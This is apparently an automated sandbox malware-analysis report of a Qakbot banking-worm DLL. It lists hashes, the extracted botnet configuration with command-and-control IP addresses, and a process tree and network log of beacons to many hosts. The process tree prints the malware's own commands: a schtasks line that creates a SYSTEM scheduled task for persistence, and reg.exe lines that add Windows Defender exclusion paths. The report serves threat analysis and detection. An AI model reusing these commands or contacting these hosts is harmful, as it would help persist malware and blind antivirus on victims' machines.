Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
01/11/2021, 12:31 UTC
211101-pp5r3ahha4 1031/10/2021, 09:03 UTC
211031-k1bwxacfaq 1014/10/2021, 01:44 UTC
211014-b6aflafeg4 10Analysis
-
max time kernel
3875s -
max time network
3890s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
31/10/2021, 09:03 UTC
General
-
Target
260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll
-
Size
1.0MB
-
MD5
10c150a949585ba3603cce27707331f0
-
SHA1
9eeb1747902951835245545b7b3b1e6408c708c2
-
SHA256
260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840
-
SHA512
668ea267488635b88ef6a929501f8f6b34a02ccb2fa01a311caf89f5c683f0dd6877d8714ddf8b6b24e7a447c40f2cf5c42698638a52ff7b27e6c47ce4f4578b
Score
10/10
Malware Config
Extracted
Family
qakbot
Version
402.363
Botnet
tr
Campaign
1633334141
C2
75.75.179.226:443
185.250.148.74:443
122.11.220.212:2222
120.150.218.241:995
103.148.120.144:443
140.82.49.12:443
40.131.140.155:995
206.47.134.234:2222
73.230.205.91:443
190.198.206.189:2222
103.157.122.198:995
81.250.153.227:2222
167.248.100.227:443
96.57.188.174:2078
217.17.56.163:2222
217.17.56.163:2078
41.228.22.180:443
136.232.34.70:443
68.186.192.69:443
167.248.111.245:443
Attributes
-
salt
jHxastDcds)oMc=jvh7wdUhxcsdt2
Signatures
-
Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
-
Windows security bypass 2 TTPs
-
Loads dropped DLL 1 IoCs
-
Drops file in System32 directory 6 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of WriteProcessMemory 26 IoCs
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn xdjevbp /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll\"" /SC ONCE /Z /ST 09:07 /ET 09:194⤵
- Creates scheduled task(s)
-
-
-
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\ProgramData\Microsoft\Torjb" /d "0"4⤵
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Gspumtmeynu" /d "0"4⤵
-
-
-
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll"2⤵
-
Network
-
DNStime.windows.comRemote address:8.8.8.8:53Requesttime.windows.comIN AResponsetime.windows.comIN CNAMEtwc.trafficmanager.nettwc.trafficmanager.netIN A40.119.148.38 -
POSThttps://94.200.181.154/t4Remote address:94.200.181.154:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 94.200.181.154
Content-Length: 77
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://109.12.111.14/t4Remote address:109.12.111.14:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 109.12.111.14
Content-Length: 77
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://216.201.162.158/t4Remote address:216.201.162.158:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 216.201.162.158
Content-Length: 75
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://72.252.201.69/t4Remote address:72.252.201.69:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 72.252.201.69
Content-Length: 81
Cache-Control: no-cache
ResponseHTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 31 Oct 2021 09:39:14 GMT
Keep-Alive: timeout=15; max=19
-
POSThttps://72.252.201.69/t4Remote address:72.252.201.69:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 72.252.201.69
Content-Length: 81
Cache-Control: no-cache
ResponseHTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 31 Oct 2021 09:39:16 GMT
Keep-Alive: timeout=15; max=19
-
POSThttps://217.17.56.163:2078/t4Remote address:217.17.56.163:2078RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 217.17.56.163:2078
Content-Length: 79
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://217.17.56.163:2078/t4Remote address:217.17.56.163:2078RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 217.17.56.163:2078
Content-Length: 80
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://209.50.20.255/t4Remote address:209.50.20.255:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 209.50.20.255
Content-Length: 81
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://140.82.49.12/t4Remote address:140.82.49.12:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 140.82.49.12
Content-Length: 77
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 31 Oct 2021 09:40:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.9.12
-
POSThttps://2.188.27.77/t4Remote address:2.188.27.77:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 2.188.27.77
Content-Length: 74
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Sun, 31 Oct 2021 09:40:02 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
Connection: close
Content-Length: 111
Content-Type: text/html
-
POSThttps://2.188.27.77/t4Remote address:2.188.27.77:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 2.188.27.77
Content-Length: 74
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Sun, 31 Oct 2021 09:40:04 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
Connection: close
Content-Length: 111
Content-Type: text/html
-
POSThttps://72.252.201.69/t4Remote address:72.252.201.69:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 72.252.201.69
Content-Length: 81
Cache-Control: no-cache
ResponseHTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 31 Oct 2021 10:00:43 GMT
Keep-Alive: timeout=15; max=19
-
POSThttps://72.252.201.69/t4Remote address:72.252.201.69:443RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 72.252.201.69
Content-Length: 81
Cache-Control: no-cache
ResponseHTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 31 Oct 2021 10:00:45 GMT
Keep-Alive: timeout=15; max=19
-
POSThttps://94.200.181.154/t4RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 94.200.181.154
Content-Length: 79
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://120.150.218.241:995/t4RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 120.150.218.241:995
Content-Length: 80
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.9.12
Content-Length: 146
-
POSThttps://2.188.27.77/t4RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 2.188.27.77
Content-Length: 78
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Sun, 31 Oct 2021 10:05:30 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
Connection: close
Content-Length: 111
Content-Type: text/html
-
POSThttps://2.188.27.77/t4RequestPOST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 2.188.27.77
Content-Length: 78
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Sun, 31 Oct 2021 10:05:32 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
Connection: close
Content-Length: 111
Content-Type: text/html
-
73.130.237.36:443
-
73.130.237.36:443
-
73.130.237.36:443
-
73.130.237.36:443
-
76.25.142.196:443
-
76.25.142.196:443
-
76.25.142.196:443
-
76.25.142.196:443
-
96.57.188.174:2078
-
96.57.188.174:2078
-
96.57.188.174:2078
-
96.57.188.174:2078
-
167.248.126.223:443
-
167.248.126.223:443
-
47.22.148.6:443
-
47.22.148.6:443
-
167.248.126.223:443
-
167.248.126.223:443
-
47.22.148.6:443
-
47.22.148.6:443
-
47.40.196.233:2222
-
47.40.196.233:2222
-
76.84.225.21:443
-
76.84.225.21:443
-
47.40.196.233:2222
-
47.40.196.233:2222
-
76.84.225.21:443
-
76.84.225.21:443
-
47.22.148.6:443
-
47.22.148.6:443
-
80.6.192.58:443
-
80.6.192.58:443
-
47.22.148.6:443
-
47.22.148.6:443
-
80.6.192.58:443
-
80.6.192.58:443
-
38.10.201.211:443
-
38.10.201.211:443
-
124.123.42.115:2222 -
124.123.42.115:2222
-
38.10.201.211:443
-
38.10.201.211:443
-
124.123.42.115:2222
-
124.123.42.115:2222
-
75.188.35.168:443
-
75.188.35.168:443
-
94.200.181.154:443https://94.200.181.154/t4tls, http
HTTP Request
POST https://94.200.181.154/t4HTTP Response
200 -
68.13.157.69:80
-
75.188.35.168:443
-
68.13.157.69:80
-
75.188.35.168:443
-
68.13.157.69:80
-
47.181.84.61:443
-
68.13.157.69:80
-
47.181.84.61:443
-
27.223.92.142:995 -
47.181.84.61:443
-
27.223.92.142:995
-
47.181.84.61:443
-
27.223.92.142:995
-
41.228.22.180:443 -
41.228.22.180:443
-
27.223.92.142:995
-
41.228.22.180:443
-
41.228.22.180:443
-
122.11.220.212:2222 -
96.46.103.226:443
-
122.11.220.212:2222
-
96.46.103.226:443
-
122.11.220.212:2222
-
96.46.103.226:443
-
122.11.220.212:2222
-
96.46.103.226:443
-
109.12.111.14:443https://109.12.111.14/t4tls, http
HTTP Request
POST https://109.12.111.14/t4HTTP Response
200 -
217.17.56.163:2222
-
217.17.56.163:2222
-
217.165.163.21:995
-
217.17.56.163:2222
-
217.17.56.163:2222
-
217.165.163.21:995
-
62.23.194.41:995 -
62.23.194.41:995
-
217.165.163.21:995
-
217.165.163.21:995
-
62.23.194.41:995
-
62.23.194.41:995
-
5.238.148.193:61202
-
5.238.148.193:61202
-
120.151.47.189:443 -
120.151.47.189:443
-
5.238.148.193:61202
-
5.238.148.193:61202
-
120.151.47.189:443
-
120.151.47.189:443
-
78.191.44.76:443 -
78.191.44.76:443
-
24.229.150.54:995
-
24.229.150.54:995
-
78.191.44.76:443
-
78.191.44.76:443
-
24.229.150.54:995
-
24.229.150.54:995
-
216.201.162.158:443https://216.201.162.158/t4tls, http
HTTP Request
POST https://216.201.162.158/t4HTTP Response
200 -
97.98.130.50:443
-
73.130.180.25:443
-
97.98.130.50:443
-
73.130.180.25:443
-
97.98.130.50:443
-
73.130.180.25:443
-
97.98.130.50:443
-
73.130.180.25:443
-
136.232.34.70:443
-
186.18.205.199:995 -
136.232.34.70:443
-
186.18.205.199:995
-
136.232.34.70:443
-
186.18.205.199:995
-
136.232.34.70:443
-
186.18.205.199:995
-
147.92.51.49:443tls
-
167.248.23.224:443
-
147.92.51.49:443tls
-
167.248.23.224:443
-
77.57.204.78:443 -
77.57.204.78:443
-
167.248.23.224:443
-
167.248.23.224:443
-
77.57.204.78:443
-
77.57.204.78:443
-
24.139.72.117:443 -
24.139.72.117:443
-
92.148.59.207:2222
-
92.148.59.207:2222
-
24.139.72.117:443
-
24.139.72.117:443
-
92.148.59.207:2222
-
92.148.59.207:2222
-
188.210.210.122:443
-
188.210.210.122:443
-
96.46.103.109:2222
-
96.46.103.109:2222
-
188.210.210.122:443
-
188.210.210.122:443
-
96.46.103.109:2222
-
96.46.103.109:2222
-
71.74.12.34:443
-
71.74.12.34:443
-
37.117.191.19:2222 -
37.117.191.19:2222
-
71.74.12.34:443
-
71.74.12.34:443
-
37.117.191.19:2222
-
37.117.191.19:2222
-
78.145.153.73:995
-
78.145.153.73:995
-
173.234.155.233:443
-
173.234.155.233:443
-
78.145.153.73:995
-
78.145.153.73:995
-
173.234.155.233:443
-
173.234.155.233:443
-
82.77.137.101:995 -
82.77.137.101:995
-
90.197.155.33:443
-
90.197.155.33:443
-
82.77.137.101:995
-
82.77.137.101:995
-
90.197.155.33:443
-
90.197.155.33:443
-
76.84.226.17:443
-
76.84.226.17:443
-
167.248.111.245:443
-
167.248.111.245:443
-
76.84.226.17:443
-
76.84.226.17:443
-
167.248.111.245:443
-
167.248.111.245:443
-
167.248.99.149:443
-
167.248.99.149:443
-
72.252.201.69:443https://72.252.201.69/t4tls, http
HTTP Request
POST https://72.252.201.69/t4HTTP Response
403 -
72.252.201.69:443https://72.252.201.69/t4tls, http
HTTP Request
POST https://72.252.201.69/t4HTTP Response
403 -
62.23.194.38:443
-
167.248.99.149:443
-
62.23.194.38:443
-
167.248.99.149:443
-
62.23.194.38:443
-
62.23.194.38:443
-
217.17.56.163:443
-
217.17.56.163:443
-
189.210.115.207:443 -
189.210.115.207:443
-
217.17.56.163:443
-
217.17.56.163:443
-
189.210.115.207:443
-
189.210.115.207:443
-
105.198.236.99:443 -
105.198.236.99:443
-
68.13.157.69:443
-
68.13.157.69:443
-
105.198.236.99:443
-
105.198.236.99:443
-
68.13.157.69:443
-
68.13.157.69:443
-
71.190.231.182:443
-
71.190.231.182:443
-
174.59.35.191:443
-
174.59.35.191:443
-
71.190.231.182:443
-
71.190.231.182:443
-
174.59.35.191:443
-
174.59.35.191:443
-
124.123.42.115:2078
-
124.123.42.115:2078
-
191.191.38.8:443 -
191.191.38.8:443
-
124.123.42.115:2078
-
124.123.42.115:2078
-
191.191.38.8:443
-
191.191.38.8:443
-
68.117.229.117:443
-
68.117.229.117:443
-
40.131.140.155:995
-
40.131.140.155:995
-
68.117.229.117:443
-
68.117.229.117:443
-
40.131.140.155:995
-
40.131.140.155:995
-
191.191.38.8:443
-
191.191.38.8:443
-
75.163.81.130:995
-
75.163.81.130:995
-
191.191.38.8:443
-
191.191.38.8:443
-
75.163.81.130:995
-
75.163.81.130:995
-
197.90.137.161:61201 -
197.90.137.161:61201
-
24.32.174.175:443
-
24.32.174.175:443
-
197.90.137.161:61201
-
197.90.137.161:61201
-
24.32.174.175:443
-
24.32.174.175:443
-
47.181.84.61:443
-
47.181.84.61:443
-
71.190.231.182:443
-
47.181.84.61:443
-
71.190.231.182:443
-
47.181.84.61:443
-
71.190.231.182:443
-
71.190.231.182:443
-
75.66.88.33:443
-
75.66.88.33:443
-
217.17.56.163:2078https://217.17.56.163:2078/t4tls, http
HTTP Request
POST https://217.17.56.163:2078/t4HTTP Response
200 -
105.198.236.99:443
-
75.66.88.33:443
-
105.198.236.99:443
-
75.66.88.33:443
-
105.198.236.99:443
-
69.80.113.148:443
-
105.198.236.99:443
-
69.80.113.148:443
-
187.56.71.109:995
-
69.80.113.148:443
-
187.56.71.109:995
-
69.80.113.148:443
-
187.56.71.109:995
-
24.32.174.175:443
-
187.56.71.109:995
-
24.32.174.175:443
-
68.13.157.69:80
-
24.32.174.175:443
-
68.13.157.69:80
-
24.32.174.175:443
-
68.13.157.69:80
-
167.248.81.60:443
-
68.13.157.69:80
-
167.248.81.60:443
-
73.52.50.32:443
-
167.248.81.60:443
-
73.52.50.32:443
-
167.248.81.60:443
-
73.52.50.32:443
-
174.59.35.191:443
-
73.52.50.32:443
-
174.59.35.191:443
-
37.210.152.224:995 -
174.59.35.191:443
-
37.210.152.224:995
-
174.59.35.191:443
-
37.210.152.224:995
-
92.157.171.41:2222
-
37.210.152.224:995
-
92.157.171.41:2222
-
68.117.229.117:443
-
92.157.171.41:2222
-
68.117.229.117:443
-
92.157.171.41:2222
-
68.117.229.117:443
-
182.176.112.182:443 -
68.117.229.117:443
-
182.176.112.182:443
-
177.130.82.197:2222
-
182.176.112.182:443
-
177.130.82.197:2222
-
182.176.112.182:443
-
177.130.82.197:2222
-
62.23.194.38:443
-
177.130.82.197:2222
-
62.23.194.38:443
-
96.83.180.29:443
-
62.23.194.38:443
-
96.83.180.29:443
-
62.23.194.38:443
-
96.83.180.29:443
-
217.17.56.163:2078https://217.17.56.163:2078/t4tls, http
HTTP Request
POST https://217.17.56.163:2078/t4HTTP Response
200 -
96.83.180.29:443
-
122.11.220.212:2222
-
122.11.220.212:2222
-
167.248.99.149:443
-
122.11.220.212:2222
-
167.248.99.149:443
-
122.11.220.212:2222
-
167.248.99.149:443
-
167.248.99.149:443
-
70.37.217.196:443
-
70.37.217.196:443
-
103.148.120.144:443
-
70.37.217.196:443
-
103.148.120.144:443
-
70.37.217.196:443
-
103.148.120.144:443
-
103.148.120.144:443
-
45.46.53.140:2222
-
45.46.53.140:2222
-
76.84.32.159:443
-
45.46.53.140:2222
-
76.84.32.159:443
-
45.46.53.140:2222
-
76.84.32.159:443
-
76.84.32.159:443
-
196.218.227.241:995
-
196.218.227.241:995
-
73.130.239.166:443
-
196.218.227.241:995
-
73.130.239.166:443
-
196.218.227.241:995
-
73.130.239.166:443
-
73.130.239.166:443
-
159.2.51.200:2222 -
159.2.51.200:2222
-
96.57.188.174:2078
-
159.2.51.200:2222
-
96.57.188.174:2078
-
159.2.51.200:2222
-
96.57.188.174:2078
-
96.57.188.174:2078
-
92.59.35.196:2222 -
92.59.35.196:2222
-
24.119.214.7:443
-
92.59.35.196:2222
-
24.119.214.7:443
-
92.59.35.196:2222
-
24.119.214.7:443
-
24.119.214.7:443
-
75.75.179.226:443
-
75.75.179.226:443
-
173.63.245.129:443
-
75.75.179.226:443
-
173.63.245.129:443
-
75.75.179.226:443
-
173.63.245.129:443
-
173.63.245.129:443
-
73.52.50.32:443
-
73.52.50.32:443
-
174.59.120.69:443
-
73.52.50.32:443
-
174.59.120.69:443
-
73.52.50.32:443
-
174.59.120.69:443
-
174.59.120.69:443
-
110.174.64.179:995
-
110.174.64.179:995
-
209.50.20.255:443https://209.50.20.255/t4tls, http
HTTP Request
POST https://209.50.20.255/t4HTTP Response
200 -
140.82.49.12:443https://140.82.49.12/t4tls, http
HTTP Request
POST https://140.82.49.12/t4HTTP Response
200 -
110.174.64.179:995
-
81.241.252.59:2078 -
110.174.64.179:995
-
81.241.252.59:2078
-
86.8.177.143:443
-
81.241.252.59:2078
-
86.8.177.143:443
-
81.241.252.59:2078
-
86.8.177.143:443
-
24.139.72.117:443
-
86.8.177.143:443
-
24.139.72.117:443
-
96.83.180.29:443
-
24.139.72.117:443
-
96.83.180.29:443
-
24.139.72.117:443
-
96.83.180.29:443
-
2.99.100.134:2222
-
96.83.180.29:443
-
2.99.100.134:2222
-
2.188.27.77:443https://2.188.27.77/t4tls, http
HTTP Request
POST https://2.188.27.77/t4HTTP Response
404 -
2.99.100.134:2222
-
2.188.27.77:443https://2.188.27.77/t4tls, http
HTTP Request
POST https://2.188.27.77/t4HTTP Response
404 -
167.248.117.81:443
-
2.99.100.134:2222
-
167.248.117.81:443
-
76.84.225.21:443
-
167.248.117.81:443
-
76.84.225.21:443
-
167.248.117.81:443
-
76.84.225.21:443
-
2.99.100.134:2222
-
76.84.225.21:443
-
2.99.100.134:2222
-
68.186.192.69:443
-
2.99.100.134:2222
-
68.186.192.69:443
-
2.99.100.134:2222
-
68.186.192.69:443
-
167.248.111.245:443
-
68.186.192.69:443
-
167.248.111.245:443
-
167.248.117.81:443
-
167.248.111.245:443
-
167.248.117.81:443
-
167.248.111.245:443
-
167.248.117.81:443
-
196.117.75.181:995 -
167.248.117.81:443
-
196.117.75.181:995
-
196.117.75.181:995
-
196.117.75.181:995
-
81.250.153.227:2222
-
76.84.226.17:443
-
81.250.153.227:2222
-
76.84.226.17:443
-
81.250.153.227:2222
-
76.84.226.17:443
-
81.250.153.227:2222
-
76.84.226.17:443
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
47.40.196.233:2222
-
105.159.144.186:995
-
86.8.177.143:443
-
105.159.144.186:995
-
86.8.177.143:443
-
105.159.144.186:995
-
86.8.177.143:443
-
105.159.144.186:995
-
86.8.177.143:443
-
174.59.242.9:443
-
217.17.56.163:465
-
174.59.242.9:443
-
217.17.56.163:465
-
174.59.242.9:443
-
217.17.56.163:465
-
174.59.242.9:443
-
217.17.56.163:465
-
173.234.155.233:443
-
188.210.210.122:443
-
173.234.155.233:443
-
188.210.210.122:443
-
173.234.155.233:443
-
188.210.210.122:443
-
173.234.155.233:443
-
188.210.210.122:443
-
72.252.201.69:443https://72.252.201.69/t4tls, http
HTTP Request
POST https://72.252.201.69/t4HTTP Response
403 -
217.17.56.163:443
-
72.252.201.69:443https://72.252.201.69/t4tls, http
HTTP Request
POST https://72.252.201.69/t4HTTP Response
403 -
217.17.56.163:443
-
78.191.44.76:443
-
78.191.44.76:443
-
217.17.56.163:443
-
217.17.56.163:443
-
78.191.44.76:443
-
78.191.44.76:443
-
72.196.22.184:443
-
72.196.22.184:443
-
173.25.166.81:443
-
173.25.166.81:443
-
72.196.22.184:443
-
72.196.22.184:443
-
173.25.166.81:443
-
173.25.166.81:443
-
81.250.153.227:2222
-
81.250.153.227:2222
-
162.244.227.34:443tls
-
8.8.8.8:53time.windows.comdns
DNS Request
time.windows.com
DNS Response
40.119.148.38
-
40.119.148.38:123time.windows.comntp
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
132KB
-
Filesize
10.0MB
-
Filesize
132KB
-
Filesize
10.0MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
10.0MB
-
Filesize
132KB
-
Filesize
10.0MB
-
Filesize
132KB
-
Filesize
4KB